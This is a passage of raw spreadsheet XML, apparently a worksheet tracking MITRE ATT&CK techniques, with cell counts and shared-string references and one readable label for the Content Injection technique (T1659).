      <c r="JL109" s="102">
        <v>0</v>
      </c>
      <c r="JM109" s="103">
        <v>0</v>
      </c>
      <c r="JN109" s="103">
        <v>0</v>
      </c>
      <c r="JO109" s="104">
        <v>0</v>
      </c>
      <c r="JP109" s="105">
        <v>0</v>
      </c>
      <c r="JQ109" s="106">
        <v>0</v>
      </c>
      <c r="JR109" s="497">
        <v>0</v>
      </c>
      <c r="JS109" s="107">
        <v>0</v>
      </c>
      <c r="JT109" s="107">
        <v>0</v>
      </c>
      <c r="JU109" s="108">
        <v>0</v>
      </c>
      <c r="JV109" s="109">
        <v>0</v>
      </c>
      <c r="JW109" s="110">
        <v>0</v>
      </c>
      <c r="JX109" s="501">
        <v>0</v>
      </c>
      <c r="JY109" s="111">
        <v>0</v>
      </c>
      <c r="JZ109" s="111">
        <v>0</v>
      </c>
      <c r="KA109" s="112">
        <v>0</v>
      </c>
      <c r="KB109" s="113">
        <v>0</v>
      </c>
      <c r="KC109" s="114">
        <v>0</v>
      </c>
      <c r="KD109" s="503">
        <v>0</v>
      </c>
      <c r="KE109" s="115">
        <v>0</v>
      </c>
      <c r="KF109" s="115">
        <v>0</v>
      </c>
      <c r="KG109" s="116">
        <v>0</v>
      </c>
      <c r="KH109" s="250">
        <v>0</v>
      </c>
      <c r="KI109" s="251">
        <v>0</v>
      </c>
      <c r="KJ109" s="505">
        <v>0</v>
      </c>
      <c r="KK109" s="252">
        <v>0</v>
      </c>
      <c r="KL109" s="252">
        <v>0</v>
      </c>
      <c r="KM109" s="253">
        <v>0</v>
      </c>
      <c r="KN109" s="101">
        <v>0</v>
      </c>
      <c r="KO109" s="102">
        <v>0</v>
      </c>
      <c r="KP109" s="102">
        <v>0</v>
      </c>
      <c r="KQ109" s="103">
        <v>0</v>
      </c>
      <c r="KR109" s="103">
        <v>0</v>
      </c>
      <c r="KS109" s="104">
        <v>0</v>
      </c>
      <c r="KT109" s="105">
        <v>0</v>
      </c>
      <c r="KU109" s="106">
        <v>0</v>
      </c>
      <c r="KV109" s="497">
        <v>0</v>
      </c>
      <c r="KW109" s="107">
        <v>0</v>
      </c>
      <c r="KX109" s="107">
        <v>0</v>
      </c>
      <c r="KY109" s="108">
        <v>0</v>
      </c>
      <c r="KZ109" s="109">
        <v>0</v>
      </c>
      <c r="LA109" s="110">
        <v>0</v>
      </c>
      <c r="LB109" s="501">
        <v>0</v>
      </c>
      <c r="LC109" s="111">
        <v>0</v>
      </c>
      <c r="LD109" s="111">
        <v>0</v>
      </c>
      <c r="LE109" s="112">
        <v>0</v>
      </c>
      <c r="LF109" s="113">
        <v>0</v>
      </c>
      <c r="LG109" s="114">
        <v>0</v>
      </c>
      <c r="LH109" s="503">
        <v>0</v>
      </c>
      <c r="LI109" s="115">
        <v>0</v>
      </c>
      <c r="LJ109" s="115">
        <v>0</v>
      </c>
      <c r="LK109" s="116">
        <v>0</v>
      </c>
      <c r="LL109" s="117">
        <v>49</v>
      </c>
      <c r="LM109" s="507">
        <v>49</v>
      </c>
      <c r="LN109" s="119">
        <v>0</v>
      </c>
      <c r="LO109" s="119">
        <v>6</v>
      </c>
      <c r="LP109" s="119">
        <v>49</v>
      </c>
      <c r="LQ109" s="119">
        <v>0</v>
      </c>
      <c r="LR109" s="119">
        <v>49</v>
      </c>
      <c r="LS109" s="119">
        <v>49</v>
      </c>
      <c r="LT109" s="382"/>
      <c r="LU109" s="117">
        <v>0</v>
      </c>
      <c r="LV109" s="118">
        <v>0</v>
      </c>
      <c r="LW109" s="507">
        <v>0</v>
      </c>
      <c r="LX109" s="119">
        <v>0</v>
      </c>
      <c r="LY109" s="119">
        <v>0</v>
      </c>
      <c r="LZ109" s="119">
        <v>0</v>
      </c>
      <c r="MA109" s="117">
        <v>0</v>
      </c>
      <c r="MB109" s="118">
        <v>0</v>
      </c>
      <c r="MC109" s="507">
        <v>0</v>
      </c>
      <c r="MD109" s="119">
        <v>0</v>
      </c>
      <c r="ME109" s="119">
        <v>0</v>
      </c>
      <c r="MF109" s="119">
        <v>0</v>
      </c>
      <c r="MG109" s="117">
        <v>0</v>
      </c>
      <c r="MH109" s="118">
        <v>0</v>
      </c>
      <c r="MI109" s="507">
        <v>0</v>
      </c>
      <c r="MJ109" s="119">
        <v>0</v>
      </c>
      <c r="MK109" s="119">
        <v>0</v>
      </c>
      <c r="ML109" s="119">
        <v>0</v>
      </c>
      <c r="MM109" s="117">
        <v>0</v>
      </c>
      <c r="MN109" s="118">
        <v>0</v>
      </c>
      <c r="MO109" s="507">
        <v>0</v>
      </c>
      <c r="MP109" s="119">
        <v>0</v>
      </c>
      <c r="MQ109" s="119">
        <v>0</v>
      </c>
      <c r="MR109" s="119">
        <v>0</v>
      </c>
      <c r="MS109" s="117">
        <v>0</v>
      </c>
      <c r="MT109" s="118">
        <v>0</v>
      </c>
      <c r="MU109" s="507">
        <v>0</v>
      </c>
      <c r="MV109" s="119">
        <v>0</v>
      </c>
      <c r="MW109" s="119">
        <v>0</v>
      </c>
      <c r="MX109" s="119">
        <v>0</v>
      </c>
      <c r="MY109" s="117">
        <v>0</v>
      </c>
      <c r="MZ109" s="118">
        <v>0</v>
      </c>
      <c r="NA109" s="507">
        <v>0</v>
      </c>
      <c r="NB109" s="119">
        <v>0</v>
      </c>
      <c r="NC109" s="119">
        <v>0</v>
      </c>
      <c r="ND109" s="119">
        <v>0</v>
      </c>
      <c r="NE109" s="117">
        <v>0</v>
      </c>
      <c r="NF109" s="118">
        <v>0</v>
      </c>
      <c r="NG109" s="507">
        <v>0</v>
      </c>
      <c r="NH109" s="119">
        <v>0</v>
      </c>
      <c r="NI109" s="119">
        <v>0</v>
      </c>
      <c r="NJ109" s="119">
        <v>0</v>
      </c>
      <c r="NK109" s="117">
        <v>0</v>
      </c>
      <c r="NL109" s="118">
        <v>0</v>
      </c>
      <c r="NM109" s="507">
        <v>0</v>
      </c>
      <c r="NN109" s="119">
        <v>0</v>
      </c>
      <c r="NO109" s="119">
        <v>0</v>
      </c>
      <c r="NP109" s="119">
        <v>0</v>
      </c>
      <c r="NQ109" s="117">
        <v>0</v>
      </c>
      <c r="NR109" s="118">
        <v>0</v>
      </c>
      <c r="NS109" s="507">
        <v>0</v>
      </c>
      <c r="NT109" s="119">
        <v>0</v>
      </c>
      <c r="NU109" s="119">
        <v>0</v>
      </c>
      <c r="NV109" s="119">
        <v>0</v>
      </c>
      <c r="NW109" s="117">
        <v>49</v>
      </c>
      <c r="NX109" s="118" t="s">
        <v>4432</v>
      </c>
      <c r="NY109" s="507">
        <v>49</v>
      </c>
      <c r="NZ109" s="119" t="s">
        <v>4433</v>
      </c>
      <c r="OA109" s="119">
        <v>6</v>
      </c>
      <c r="OB109" s="119">
        <v>49</v>
      </c>
      <c r="OC109" s="120">
        <v>0</v>
      </c>
      <c r="OD109" s="120">
        <v>0</v>
      </c>
      <c r="OE109" s="120">
        <v>0</v>
      </c>
      <c r="OF109" s="121">
        <v>0</v>
      </c>
      <c r="OG109" s="120">
        <v>0</v>
      </c>
      <c r="OH109" s="120">
        <v>0</v>
      </c>
      <c r="OI109" s="120">
        <v>0</v>
      </c>
      <c r="OJ109" s="120">
        <v>0</v>
      </c>
      <c r="OK109" s="383"/>
      <c r="OL109" s="120">
        <v>0</v>
      </c>
      <c r="OM109" s="120">
        <v>0</v>
      </c>
      <c r="ON109" s="120">
        <v>0</v>
      </c>
      <c r="OO109" s="120"/>
      <c r="OP109" s="120">
        <v>0</v>
      </c>
      <c r="OQ109" s="464">
        <v>0</v>
      </c>
      <c r="OR109" s="120">
        <v>0</v>
      </c>
      <c r="OS109" s="120">
        <v>0</v>
      </c>
      <c r="OT109" s="120">
        <v>0</v>
      </c>
      <c r="OU109" s="120"/>
      <c r="OV109" s="120">
        <v>0</v>
      </c>
      <c r="OW109" s="464">
        <v>0</v>
      </c>
      <c r="OX109" s="120">
        <v>0</v>
      </c>
      <c r="OY109" s="120">
        <v>0</v>
      </c>
      <c r="OZ109" s="120">
        <v>0</v>
      </c>
      <c r="PA109" s="120"/>
      <c r="PB109" s="120">
        <v>0</v>
      </c>
      <c r="PC109" s="464">
        <v>0</v>
      </c>
      <c r="PD109" s="120">
        <v>0</v>
      </c>
      <c r="PE109" s="120">
        <v>0</v>
      </c>
      <c r="PF109" s="120">
        <v>0</v>
      </c>
      <c r="PG109" s="120"/>
      <c r="PH109" s="120">
        <v>0</v>
      </c>
      <c r="PI109" s="464">
        <v>0</v>
      </c>
      <c r="PJ109" s="120">
        <v>0</v>
      </c>
      <c r="PK109" s="120">
        <v>0</v>
      </c>
      <c r="PL109" s="120">
        <v>0</v>
      </c>
      <c r="PM109" s="120"/>
      <c r="PN109" s="120">
        <v>0</v>
      </c>
      <c r="PO109" s="464">
        <v>0</v>
      </c>
      <c r="PP109" s="120">
        <v>0</v>
      </c>
      <c r="PQ109" s="120">
        <v>0</v>
      </c>
      <c r="PR109" s="120">
        <v>0</v>
      </c>
      <c r="PS109" s="120"/>
      <c r="PT109" s="120">
        <v>0</v>
      </c>
      <c r="PU109" s="464">
        <v>0</v>
      </c>
      <c r="PV109" s="120">
        <v>0</v>
      </c>
      <c r="PW109" s="120">
        <v>0</v>
      </c>
      <c r="PX109" s="120">
        <v>0</v>
      </c>
      <c r="PY109" s="120"/>
      <c r="PZ109" s="120">
        <v>0</v>
      </c>
      <c r="QA109" s="464">
        <v>0</v>
      </c>
      <c r="QB109" s="120">
        <v>0</v>
      </c>
      <c r="QC109" s="120">
        <v>0</v>
      </c>
      <c r="QD109" s="120">
        <v>0</v>
      </c>
      <c r="QE109" s="120"/>
      <c r="QF109" s="120">
        <v>0</v>
      </c>
      <c r="QG109" s="464">
        <v>0</v>
      </c>
      <c r="QH109" s="120">
        <v>0</v>
      </c>
      <c r="QI109" s="120">
        <v>0</v>
      </c>
      <c r="QJ109" s="120">
        <v>0</v>
      </c>
      <c r="QK109" s="120"/>
      <c r="QL109" s="120">
        <v>0</v>
      </c>
      <c r="QM109" s="464">
        <v>0</v>
      </c>
      <c r="QN109" s="120">
        <v>0</v>
      </c>
      <c r="QO109" s="120">
        <v>0</v>
      </c>
      <c r="QP109" s="120">
        <v>0</v>
      </c>
      <c r="QQ109" s="120"/>
      <c r="QR109" s="120">
        <v>0</v>
      </c>
      <c r="QS109" s="464">
        <v>0</v>
      </c>
      <c r="QT109" s="184"/>
      <c r="QU109" s="184"/>
      <c r="QV109" s="184"/>
      <c r="QW109" s="184"/>
      <c r="QX109" s="184"/>
      <c r="QY109" s="184"/>
      <c r="QZ109" s="184"/>
      <c r="RA109" s="184"/>
      <c r="RB109" s="184"/>
      <c r="RC109" s="184"/>
      <c r="RD109" s="184"/>
      <c r="RE109" s="184"/>
      <c r="RF109" s="184"/>
      <c r="RG109" s="184"/>
      <c r="RH109" s="184"/>
      <c r="RI109" s="184"/>
      <c r="RJ109" s="184"/>
      <c r="RK109" s="184"/>
      <c r="RL109" s="184"/>
      <c r="RM109" s="184"/>
      <c r="RN109" s="184"/>
      <c r="RO109" s="184"/>
      <c r="RP109" s="184"/>
      <c r="RQ109" s="184"/>
      <c r="RR109" s="184"/>
      <c r="RS109" s="184"/>
      <c r="RT109" s="184"/>
      <c r="RU109" s="184"/>
      <c r="RV109" s="184"/>
      <c r="RW109" s="184"/>
      <c r="RX109" s="184"/>
      <c r="RY109" s="184"/>
      <c r="RZ109" s="184"/>
      <c r="SA109" s="184"/>
      <c r="SB109" s="184"/>
      <c r="SC109" s="184"/>
      <c r="SD109" s="184"/>
      <c r="SE109" s="184"/>
      <c r="SF109" s="184"/>
      <c r="SG109" s="184"/>
      <c r="SH109" s="184"/>
      <c r="SI109" s="184"/>
      <c r="SJ109" s="184"/>
      <c r="SK109" s="184"/>
      <c r="SL109" s="184"/>
      <c r="SM109" s="184"/>
      <c r="SN109" s="184"/>
      <c r="SO109" s="184"/>
      <c r="SP109" s="184"/>
      <c r="SQ109" s="184"/>
      <c r="SR109" s="184"/>
      <c r="SS109" s="184"/>
      <c r="ST109" s="184"/>
      <c r="SU109" s="184"/>
      <c r="SV109" s="184"/>
      <c r="SW109" s="184"/>
      <c r="SX109" s="184"/>
      <c r="SY109" s="184"/>
      <c r="SZ109" s="184"/>
      <c r="TA109" s="184"/>
      <c r="TB109" s="184"/>
      <c r="TC109" s="184"/>
      <c r="TD109" s="184"/>
      <c r="TE109" s="184"/>
      <c r="TF109" s="184"/>
      <c r="TG109" s="184"/>
      <c r="TH109" s="184"/>
      <c r="TI109" s="184"/>
      <c r="TJ109" s="184"/>
      <c r="TK109" s="184"/>
      <c r="TL109" s="184"/>
      <c r="TM109" s="184"/>
      <c r="TN109" s="184"/>
      <c r="TO109" s="184"/>
      <c r="TP109" s="184"/>
      <c r="TQ109" s="184"/>
      <c r="TR109" s="184"/>
      <c r="TS109" s="184"/>
      <c r="TT109" s="184"/>
      <c r="TU109" s="184"/>
      <c r="TV109" s="184"/>
      <c r="TW109" s="184"/>
      <c r="TX109" s="184"/>
      <c r="TY109" s="184"/>
      <c r="TZ109" s="184"/>
      <c r="UA109" s="184"/>
      <c r="UB109" s="184"/>
      <c r="UC109" s="184"/>
      <c r="UD109" s="184"/>
      <c r="UE109" s="184"/>
      <c r="UF109" s="184"/>
      <c r="UG109" s="184"/>
      <c r="UH109" s="184"/>
      <c r="UI109" s="184"/>
      <c r="UJ109" s="184"/>
      <c r="UK109" s="184"/>
      <c r="UL109" s="184"/>
      <c r="UM109" s="184"/>
      <c r="UN109" s="184"/>
      <c r="UO109" s="184"/>
      <c r="UP109" s="184"/>
      <c r="UQ109" s="184"/>
      <c r="UR109" s="184"/>
      <c r="US109" s="184"/>
      <c r="UT109" s="184"/>
      <c r="UU109" s="184"/>
      <c r="UV109" s="184"/>
      <c r="UW109" s="184"/>
      <c r="UX109" s="184"/>
      <c r="UY109" s="184"/>
      <c r="UZ109" s="184"/>
      <c r="VA109" s="184"/>
      <c r="VB109" s="184"/>
      <c r="VC109" s="184"/>
      <c r="VD109" s="184"/>
      <c r="VE109" s="184"/>
      <c r="VF109" s="184"/>
      <c r="VG109" s="184"/>
      <c r="VH109" s="184"/>
      <c r="VI109" s="184"/>
      <c r="VJ109" s="184"/>
      <c r="VK109" s="184"/>
      <c r="VL109" s="184"/>
      <c r="VM109" s="184"/>
      <c r="VN109" s="184"/>
      <c r="VO109" s="184"/>
      <c r="VP109" s="184"/>
      <c r="VQ109" s="184"/>
      <c r="VR109" s="184"/>
      <c r="VS109" s="184"/>
      <c r="VT109" s="184"/>
      <c r="VU109" s="184"/>
      <c r="VV109" s="184"/>
      <c r="VW109" s="184"/>
      <c r="VX109" s="184"/>
      <c r="VY109" s="184"/>
    </row>
    <row r="110" spans="1:597" ht="39.950000000000003" customHeight="1">
      <c r="A110" s="82" t="s">
        <v>72</v>
      </c>
      <c r="B110" s="83" t="s">
        <v>5</v>
      </c>
      <c r="C110" s="83" t="s">
        <v>437</v>
      </c>
      <c r="D110" s="83" t="s">
        <v>170</v>
      </c>
      <c r="E110" s="83">
        <f t="shared" si="5"/>
        <v>74</v>
      </c>
      <c r="F110" s="83" t="s">
        <v>171</v>
      </c>
      <c r="G110" s="83" t="s">
        <v>4</v>
      </c>
      <c r="H110" s="83" t="s">
        <v>4</v>
      </c>
      <c r="I110" s="81" t="s">
        <v>1700</v>
      </c>
      <c r="J110" s="85" t="s">
        <v>795</v>
      </c>
      <c r="K110" s="81" t="s">
        <v>1701</v>
      </c>
      <c r="L110" s="81" t="s">
        <v>1702</v>
      </c>
      <c r="M110" s="378" t="s">
        <v>269</v>
      </c>
      <c r="N110" s="74" t="str">
        <f t="shared" si="3"/>
        <v>OK</v>
      </c>
      <c r="O110" s="485" t="str">
        <f t="shared" si="4"/>
        <v>New</v>
      </c>
      <c r="P110" s="91"/>
      <c r="Q110" s="379" t="s">
        <v>745</v>
      </c>
      <c r="R110" s="92" t="s">
        <v>1703</v>
      </c>
      <c r="S110" s="93" t="s">
        <v>799</v>
      </c>
      <c r="T110" s="92" t="s">
        <v>1462</v>
      </c>
      <c r="U110" s="94" t="s">
        <v>1704</v>
      </c>
      <c r="V110" s="95" t="s">
        <v>751</v>
      </c>
      <c r="W110" s="96" t="s">
        <v>1705</v>
      </c>
      <c r="X110" s="97" t="s">
        <v>1706</v>
      </c>
      <c r="Y110" s="83" t="s">
        <v>1707</v>
      </c>
      <c r="Z110" s="188" t="s">
        <v>1708</v>
      </c>
      <c r="AA110" s="182" t="s">
        <v>745</v>
      </c>
      <c r="AB110" s="183" t="s">
        <v>745</v>
      </c>
      <c r="AC110" s="302" t="s">
        <v>745</v>
      </c>
      <c r="AD110" s="83"/>
      <c r="AE110" s="83"/>
      <c r="AF110" s="384" t="s">
        <v>4</v>
      </c>
      <c r="AG110" s="88" t="s">
        <v>745</v>
      </c>
      <c r="AH110" s="341" t="s">
        <v>746</v>
      </c>
      <c r="AI110" s="353" t="s">
        <v>756</v>
      </c>
      <c r="AJ110" s="353" t="s">
        <v>747</v>
      </c>
      <c r="AK110" s="354" t="s">
        <v>745</v>
      </c>
      <c r="AL110" s="355" t="s">
        <v>747</v>
      </c>
      <c r="AM110" s="355" t="s">
        <v>756</v>
      </c>
      <c r="AN110" s="355" t="s">
        <v>756</v>
      </c>
      <c r="AO110" s="359" t="s">
        <v>756</v>
      </c>
      <c r="AP110" s="385" t="str">
        <f>M110&amp;"-frag"</f>
        <v>T1659-Content_Injection-frag</v>
      </c>
      <c r="AQ110" s="646">
        <v>89</v>
      </c>
      <c r="AR110" s="100"/>
      <c r="AS110" s="100">
        <v>2</v>
      </c>
      <c r="AT110" s="100">
        <v>0</v>
      </c>
      <c r="AU110" s="100">
        <v>2</v>
      </c>
      <c r="AV110" s="92" t="s">
        <v>4</v>
      </c>
      <c r="AW110" s="100">
        <v>2</v>
      </c>
      <c r="AX110" s="100">
        <v>2</v>
      </c>
      <c r="AY110" s="100">
        <v>0</v>
      </c>
      <c r="AZ110" s="100">
        <v>2</v>
      </c>
      <c r="BA110" s="381" t="s">
        <v>4914</v>
      </c>
      <c r="BB110" s="101">
        <v>2</v>
      </c>
      <c r="BC110" s="102" t="s">
        <v>1833</v>
      </c>
      <c r="BD110" s="102">
        <v>2</v>
      </c>
      <c r="BE110" s="103" t="s">
        <v>1805</v>
      </c>
      <c r="BF110" s="103">
        <v>2</v>
      </c>
      <c r="BG110" s="104">
        <v>2</v>
      </c>
      <c r="BH110" s="105">
        <v>3</v>
      </c>
      <c r="BI110" s="106" t="s">
        <v>1881</v>
      </c>
      <c r="BJ110" s="497">
        <v>3</v>
      </c>
      <c r="BK110" s="107" t="s">
        <v>1882</v>
      </c>
      <c r="BL110" s="107">
        <v>3</v>
      </c>
      <c r="BM110" s="108">
        <v>2</v>
      </c>
      <c r="BN110" s="109">
        <v>5</v>
      </c>
      <c r="BO110" s="110" t="s">
        <v>1889</v>
      </c>
      <c r="BP110" s="501">
        <v>5</v>
      </c>
      <c r="BQ110" s="111" t="s">
        <v>1890</v>
      </c>
      <c r="BR110" s="111">
        <v>5</v>
      </c>
      <c r="BS110" s="112">
        <v>3</v>
      </c>
      <c r="BT110" s="113">
        <v>17</v>
      </c>
      <c r="BU110" s="114" t="s">
        <v>4086</v>
      </c>
      <c r="BV110" s="503">
        <v>13</v>
      </c>
      <c r="BW110" s="115" t="s">
        <v>4087</v>
      </c>
      <c r="BX110" s="115">
        <v>10</v>
      </c>
      <c r="BY110" s="116">
        <v>9</v>
      </c>
      <c r="BZ110" s="250">
        <v>62</v>
      </c>
      <c r="CA110" s="251" t="s">
        <v>4088</v>
      </c>
      <c r="CB110" s="505">
        <v>25</v>
      </c>
      <c r="CC110" s="252" t="s">
        <v>4089</v>
      </c>
      <c r="CD110" s="252">
        <v>11</v>
      </c>
      <c r="CE110" s="253">
        <v>18</v>
      </c>
      <c r="CF110" s="101">
        <v>79</v>
      </c>
      <c r="CG110" s="102" t="s">
        <v>4090</v>
      </c>
      <c r="CH110" s="102">
        <v>38</v>
      </c>
      <c r="CI110" s="103" t="s">
        <v>4091</v>
      </c>
      <c r="CJ110" s="103">
        <v>21</v>
      </c>
      <c r="CK110" s="104">
        <v>24</v>
      </c>
      <c r="CL110" s="105">
        <v>0</v>
      </c>
      <c r="CM110" s="106">
        <v>0</v>
      </c>
      <c r="CN110" s="497">
        <v>0</v>
      </c>
      <c r="CO110" s="107">
        <v>0</v>
      </c>
      <c r="CP110" s="107">
        <v>0</v>
      </c>
      <c r="CQ110" s="108">
        <v>0</v>
      </c>
      <c r="CR110" s="109">
        <v>5</v>
      </c>
      <c r="CS110" s="110" t="s">
        <v>4092</v>
      </c>
      <c r="CT110" s="501">
        <v>2</v>
      </c>
      <c r="CU110" s="111" t="s">
        <v>3177</v>
      </c>
      <c r="CV110" s="111">
        <v>2</v>
      </c>
      <c r="CW110" s="112">
        <v>2</v>
      </c>
      <c r="CX110" s="113">
        <v>10</v>
      </c>
      <c r="CY110" s="114" t="s">
        <v>2211</v>
      </c>
      <c r="CZ110" s="503">
        <v>7</v>
      </c>
      <c r="DA110" s="115" t="s">
        <v>2212</v>
      </c>
      <c r="DB110" s="115">
        <v>7</v>
      </c>
      <c r="DC110" s="116">
        <v>4</v>
      </c>
      <c r="DD110" s="101">
        <v>0</v>
      </c>
      <c r="DE110" s="102">
        <v>0</v>
      </c>
      <c r="DF110" s="102">
        <v>0</v>
      </c>
      <c r="DG110" s="103">
        <v>0</v>
      </c>
      <c r="DH110" s="103">
        <v>0</v>
      </c>
      <c r="DI110" s="104">
        <v>0</v>
      </c>
      <c r="DJ110" s="105">
        <v>2</v>
      </c>
      <c r="DK110" s="106" t="s">
        <v>3724</v>
      </c>
      <c r="DL110" s="497">
        <v>2</v>
      </c>
      <c r="DM110" s="107" t="s">
        <v>3179</v>
      </c>
      <c r="DN110" s="107">
        <v>2</v>
      </c>
      <c r="DO110" s="108">
        <v>2</v>
      </c>
      <c r="DP110" s="109">
        <v>2</v>
      </c>
      <c r="DQ110" s="110" t="s">
        <v>3724</v>
      </c>
      <c r="DR110" s="501">
        <v>2</v>
      </c>
      <c r="DS110" s="111" t="s">
        <v>3179</v>
      </c>
      <c r="DT110" s="111">
        <v>2</v>
      </c>
      <c r="DU110" s="112">
        <v>2</v>
      </c>
      <c r="DV110" s="113">
        <v>9</v>
      </c>
      <c r="DW110" s="114" t="s">
        <v>4093</v>
      </c>
      <c r="DX110" s="503">
        <v>8</v>
      </c>
      <c r="DY110" s="115" t="s">
        <v>4094</v>
      </c>
      <c r="DZ110" s="115">
        <v>5</v>
      </c>
      <c r="EA110" s="116">
        <v>6</v>
      </c>
      <c r="EB110" s="250">
        <v>4</v>
      </c>
      <c r="EC110" s="251" t="s">
        <v>4095</v>
      </c>
      <c r="ED110" s="505">
        <v>4</v>
      </c>
      <c r="EE110" s="252" t="s">
        <v>3183</v>
      </c>
      <c r="EF110" s="252">
        <v>4</v>
      </c>
      <c r="EG110" s="253">
        <v>2</v>
      </c>
      <c r="EH110" s="101">
        <v>13</v>
      </c>
      <c r="EI110" s="102" t="s">
        <v>4096</v>
      </c>
      <c r="EJ110" s="102">
        <v>12</v>
      </c>
      <c r="EK110" s="103" t="s">
        <v>4097</v>
      </c>
      <c r="EL110" s="103">
        <v>9</v>
      </c>
      <c r="EM110" s="104">
        <v>6</v>
      </c>
      <c r="EN110" s="105">
        <v>0</v>
      </c>
      <c r="EO110" s="106">
        <v>0</v>
      </c>
      <c r="EP110" s="497">
        <v>0</v>
      </c>
      <c r="EQ110" s="107">
        <v>0</v>
      </c>
      <c r="ER110" s="107">
        <v>0</v>
      </c>
      <c r="ES110" s="108">
        <v>0</v>
      </c>
      <c r="ET110" s="109">
        <v>0</v>
      </c>
      <c r="EU110" s="110">
        <v>0</v>
      </c>
      <c r="EV110" s="501">
        <v>0</v>
      </c>
      <c r="EW110" s="111">
        <v>0</v>
      </c>
      <c r="EX110" s="111">
        <v>0</v>
      </c>
      <c r="EY110" s="112">
        <v>0</v>
      </c>
      <c r="EZ110" s="113">
        <v>2</v>
      </c>
      <c r="FA110" s="114" t="s">
        <v>3724</v>
      </c>
      <c r="FB110" s="503">
        <v>2</v>
      </c>
      <c r="FC110" s="115" t="s">
        <v>3179</v>
      </c>
      <c r="FD110" s="115">
        <v>2</v>
      </c>
      <c r="FE110" s="116">
        <v>2</v>
      </c>
      <c r="FF110" s="101">
        <v>2</v>
      </c>
      <c r="FG110" s="102" t="s">
        <v>1833</v>
      </c>
      <c r="FH110" s="102">
        <v>2</v>
      </c>
      <c r="FI110" s="103" t="s">
        <v>1805</v>
      </c>
      <c r="FJ110" s="103">
        <v>2</v>
      </c>
      <c r="FK110" s="104">
        <v>2</v>
      </c>
      <c r="FL110" s="105">
        <v>0</v>
      </c>
      <c r="FM110" s="106">
        <v>0</v>
      </c>
      <c r="FN110" s="497">
        <v>0</v>
      </c>
      <c r="FO110" s="107">
        <v>0</v>
      </c>
      <c r="FP110" s="107">
        <v>0</v>
      </c>
      <c r="FQ110" s="108">
        <v>0</v>
      </c>
      <c r="FR110" s="109">
        <v>2</v>
      </c>
      <c r="FS110" s="110" t="s">
        <v>1833</v>
      </c>
      <c r="FT110" s="501">
        <v>2</v>
      </c>
      <c r="FU110" s="111" t="s">
        <v>1805</v>
      </c>
      <c r="FV110" s="111">
        <v>2</v>
      </c>
      <c r="FW110" s="112">
        <v>2</v>
      </c>
      <c r="FX110" s="113">
        <v>3</v>
      </c>
      <c r="FY110" s="114" t="s">
        <v>4098</v>
      </c>
      <c r="FZ110" s="503">
        <v>3</v>
      </c>
      <c r="GA110" s="115" t="s">
        <v>4099</v>
      </c>
      <c r="GB110" s="115">
        <v>3</v>
      </c>
      <c r="GC110" s="116">
        <v>3</v>
      </c>
      <c r="GD110" s="250">
        <v>44</v>
      </c>
      <c r="GE110" s="251" t="s">
        <v>4100</v>
      </c>
      <c r="GF110" s="505">
        <v>7</v>
      </c>
      <c r="GG110" s="252" t="s">
        <v>4101</v>
      </c>
      <c r="GH110" s="252">
        <v>4</v>
      </c>
      <c r="GI110" s="253">
        <v>5</v>
      </c>
      <c r="GJ110" s="101">
        <v>47</v>
      </c>
      <c r="GK110" s="102" t="s">
        <v>4102</v>
      </c>
      <c r="GL110" s="102">
        <v>10</v>
      </c>
      <c r="GM110" s="103" t="s">
        <v>4103</v>
      </c>
      <c r="GN110" s="103">
        <v>7</v>
      </c>
      <c r="GO110" s="104">
        <v>7</v>
      </c>
      <c r="GP110" s="105">
        <v>0</v>
      </c>
      <c r="GQ110" s="106">
        <v>0</v>
      </c>
      <c r="GR110" s="497">
        <v>0</v>
      </c>
      <c r="GS110" s="107">
        <v>0</v>
      </c>
      <c r="GT110" s="107">
        <v>0</v>
      </c>
      <c r="GU110" s="108">
        <v>0</v>
      </c>
      <c r="GV110" s="109">
        <v>1</v>
      </c>
      <c r="GW110" s="110" t="s">
        <v>1960</v>
      </c>
      <c r="GX110" s="501">
        <v>1</v>
      </c>
      <c r="GY110" s="111" t="s">
        <v>1961</v>
      </c>
      <c r="GZ110" s="111">
        <v>1</v>
      </c>
      <c r="HA110" s="112">
        <v>1</v>
      </c>
      <c r="HB110" s="113">
        <v>3</v>
      </c>
      <c r="HC110" s="114" t="s">
        <v>4104</v>
      </c>
      <c r="HD110" s="503">
        <v>3</v>
      </c>
      <c r="HE110" s="115" t="s">
        <v>4105</v>
      </c>
      <c r="HF110" s="115">
        <v>3</v>
      </c>
      <c r="HG110" s="116">
        <v>3</v>
      </c>
      <c r="HH110" s="101">
        <v>0</v>
      </c>
      <c r="HI110" s="102">
        <v>0</v>
      </c>
      <c r="HJ110" s="102">
        <v>0</v>
      </c>
      <c r="HK110" s="103">
        <v>0</v>
      </c>
      <c r="HL110" s="103">
        <v>0</v>
      </c>
      <c r="HM110" s="104">
        <v>0</v>
      </c>
      <c r="HN110" s="105">
        <v>1</v>
      </c>
      <c r="HO110" s="106" t="s">
        <v>3408</v>
      </c>
      <c r="HP110" s="497">
        <v>1</v>
      </c>
      <c r="HQ110" s="107" t="s">
        <v>2657</v>
      </c>
      <c r="HR110" s="107">
        <v>1</v>
      </c>
      <c r="HS110" s="108">
        <v>1</v>
      </c>
      <c r="HT110" s="109">
        <v>1</v>
      </c>
      <c r="HU110" s="110" t="s">
        <v>3408</v>
      </c>
      <c r="HV110" s="501">
        <v>1</v>
      </c>
      <c r="HW110" s="111" t="s">
        <v>2657</v>
      </c>
      <c r="HX110" s="111">
        <v>1</v>
      </c>
      <c r="HY110" s="112">
        <v>1</v>
      </c>
      <c r="HZ110" s="113">
        <v>5</v>
      </c>
      <c r="IA110" s="114" t="s">
        <v>4106</v>
      </c>
      <c r="IB110" s="503">
        <v>2</v>
      </c>
      <c r="IC110" s="115" t="s">
        <v>3041</v>
      </c>
      <c r="ID110" s="115">
        <v>2</v>
      </c>
      <c r="IE110" s="116">
        <v>2</v>
      </c>
      <c r="IF110" s="250">
        <v>14</v>
      </c>
      <c r="IG110" s="251" t="s">
        <v>4107</v>
      </c>
      <c r="IH110" s="505">
        <v>14</v>
      </c>
      <c r="II110" s="252" t="s">
        <v>4108</v>
      </c>
      <c r="IJ110" s="252">
        <v>3</v>
      </c>
      <c r="IK110" s="253">
        <v>14</v>
      </c>
      <c r="IL110" s="101">
        <v>19</v>
      </c>
      <c r="IM110" s="102" t="s">
        <v>4109</v>
      </c>
      <c r="IN110" s="102">
        <v>16</v>
      </c>
      <c r="IO110" s="103" t="s">
        <v>4110</v>
      </c>
      <c r="IP110" s="103">
        <v>5</v>
      </c>
      <c r="IQ110" s="104">
        <v>16</v>
      </c>
      <c r="IR110" s="105">
        <v>0</v>
      </c>
      <c r="IS110" s="106">
        <v>0</v>
      </c>
      <c r="IT110" s="497">
